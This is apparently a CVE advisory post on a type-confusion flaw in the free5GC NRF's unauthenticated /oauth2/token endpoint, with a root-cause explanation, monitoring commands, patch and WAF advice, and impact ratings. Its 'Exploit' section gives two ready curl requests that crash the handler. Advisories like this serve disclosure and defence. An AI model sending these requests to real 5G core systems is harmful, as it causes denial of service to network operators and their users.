Listen to this Post
The vulnerability resides in the NRF’s `/oauth2/token` endpoint handler. Its parser iterates over the fields of the `AccessTokenReq` struct using Go reflection. It has specific logic for string and `NfType` fields, but for all others, it incorrectly assumes they are of type models.PlmnId. An attacker can send a form-encoded POST request containing a JSON payload for any “other” field, like requesterPlmnList. The parser unmarshals the JSON into a `models.PlmnId` object and then tries to assign it to the actual field in the request struct. This leads to a panic if the target field’s type is incompatible (e.g., a slice or a different struct). The Gin web framework recovers from the panic and returns an `HTTP 500` error, but the damage is done: the handler crashes, and a stack trace is generated. Critically, the `/oauth2/token` endpoint is unauthenticated by design, meaning any remote attacker can trigger the crash. The root cause is a type-confusion bug (CWE-843) in the form parser, leading to a denial-of-service (DoS) condition .
DailyCVE Form
Platform: free5GC NRF
Version: v4.2.1
Vulnerability: Type Confusion
Severity: Medium (DoS)
date: 2026-03-22
Prediction: fixed within 30 days
Analytics under heading What Undercode Say:
Log the exploit attempts
sudo grep "panic: reflect.Set" /var/log/free5gc/nrf.log
Monitor NRF container health
docker ps --filter "name=nrf" --format "table {{.Names}}\t{{.Status}}"
Check for repeated 500 errors on the endpoint
sudo grep "POST /oauth2/token" /var/log/nginx/access.log | grep "500" | wc -l
Exploit:
Single request DoS by mismatching types (slice vs struct)
curl -i -X POST http://10.100.200.3:8000/oauth2/token -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'requesterPlmnList={"mcc":"208","mnc":"93"}'
curl -i -X POST http://10.100.200.3:8000/oauth2/token -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'targetNsiList={"mcc":"208","mnc":"93"}'
Protection from this CVE
Upgrade to a patched version of free5GC. The fix is included in pull request free5gc/nrf83. If upgrading is not immediately possible, implement a Web Application Firewall (WAF) rule to block the specific vulnerable request patterns or deploy reverse proxy logic to sanitize input payloads.
Impact:
Availability: Remote, unauthenticated attackers can repeatedly crash the NRF’s token issuance handler, causing a denial of service and generating high-volume logs.
Confidentiality: None. The server returns empty `HTTP 500` responses.
Integrity: None. The panic occurs before any state change.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
